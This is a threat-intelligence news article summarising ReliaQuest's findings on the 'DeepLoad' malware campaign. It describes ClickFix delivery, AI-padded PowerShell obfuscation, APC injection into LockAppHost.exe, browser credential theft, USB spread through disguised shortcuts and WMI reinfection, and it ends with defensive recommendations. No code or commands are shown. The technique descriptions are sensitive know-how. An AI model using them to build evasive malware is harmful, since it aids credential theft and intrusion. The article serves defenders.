A sophisticated new malware campaign dubbed “DeepLoad” has emerged targeting enterprise environments, combining ClickFix social engineering delivery with AI-generated obfuscation techniques that defeat traditional security controls. ReliaQuest researchers discovered the threat after observing it achieve persistent, credential-stealing access through a single user action.
What Makes DeepLoad Different
DeepLoad isn’t notable for any single technique—it’s the entire attack chain engineered to defeat the controls most organizations rely on. The malware arrives via ClickFix, a social engineering technique that tricks users into running malicious commands themselves through fake browser prompts or phishing pages with realistic “error” messaging.
Once a user pastes the command, mshta.exe retrieves an obfuscated PowerShell loader from attacker infrastructure. The staging domains observed across incidents began serving malicious content within 22 minutes of registration—putting security teams that rely on manual triage at a significant disadvantage.
AI-Generated Obfuscation Defeats Static Scanning
DeepLoad’s PowerShell loader buries its real logic under thousands of meaningless variable assignments that resemble routine scripting. The functional code is minimal—a short XOR routine that decrypts an in-memory shellcode container using a hardcoded key. The decoded payload is never written to disk, giving file-based security tools nothing to find.
The sheer volume of padding likely rules out a human author. ReliaQuest assesses with high confidence that AI was used to build this obfuscation layer. If true, organizations should expect frequent malware updates with less time to adapt detection coverage between waves.
Hiding Inside Windows Lock Screen
After initial access, DeepLoad injects its payload into LockAppHost.exe, the legitimate Windows process that manages the lock screen. This was likely a deliberate choice—LockAppHost.exe doesn’t typically initiate outbound network activity, so most security tools aren’t written to monitor it.
The malware uses APC (Asynchronous Procedure Call) injection to achieve this: launching the target process suspended, writing shellcode into its memory, then using QueueUserAPC to trigger execution when the process resumes.
Credential Theft Starts Immediately
DeepLoad steals credentials from the moment it lands. A standalone credential stealer named filemanager.exe runs on separate infrastructure and can exfiltrate data even if the main loader is detected and blocked. The name appears intentional—it looks like a harmless system utility.
The campaign also deploys a malicious browser extension that captures credentials as users type them, persisting across every browser session until explicitly removed. This creates two compounding credential-theft paths:
- Stored credential scraping — pulling saved browser passwords directly
- Live interception — capturing active logins, open tabs, and session tokens in real-time
USB Spread Extends the Blast Radius
Within ten minutes of initial infection, researchers observed USB activity tracked separately in the C2 backend. When a USB drive was connected to an infected host:
- Over 40 files were written to the drive in a single operation
- Files were disguised as familiar installers: ChromeSetup.lnk, Firefox Installer.lnk, AnyDesk.lnk
- Each shortcut file can retrigger the full infection on double-click
Defenders should treat all removable media connected to affected hosts as potentially compromised.
Hidden WMI Persistence Survives Cleanup
Standard endpoint cleanup isn’t enough. DeepLoad used Windows Management Instrumentation (WMI) to reinfect a “clean” host three days later with no user action required.
WMI subscriptions live in a separate repository that most cleanup workflows don’t check, and they leave no file on disk. In ReliaQuest’s investigation, the surviving subscription fired and dropped filemanager.exe back into the user’s Downloads folder—after the host had passed routine cleanup.
Defense Recommendations
- Add WMI subscription auditing to remediation checklists—explicitly enumerate and remove suspicious subscriptions before returning hosts to production
- Enable PowerShell Script Block Logging—it captures decoded commands at runtime and cuts through obfuscation
- Monitor for unexpected mshta.exe outbound connections, newly created scheduled tasks, and PowerShell launched with execution policy bypass
- Rotate ALL credentials from affected hosts—saved passwords, session tokens, and any accounts active during the infection window
- Audit browser extensions and remove any outside standard deployment paths
Why This Matters
DeepLoad demonstrates that newly surfaced threats can arrive operationally mature. The combination of AI-assisted obfuscation, fileless execution, multiple credential theft vectors, USB propagation, and hidden persistence creates a threat that requires behavioral detection—not file-based scanning—to catch early.
As AI makes new variants cheaper to produce, expect the obfuscation to evolve from generic noise to padding tailored to specific environments, making behavioral baselining harder over time.
Source: ReliaQuest Threat Spotlight
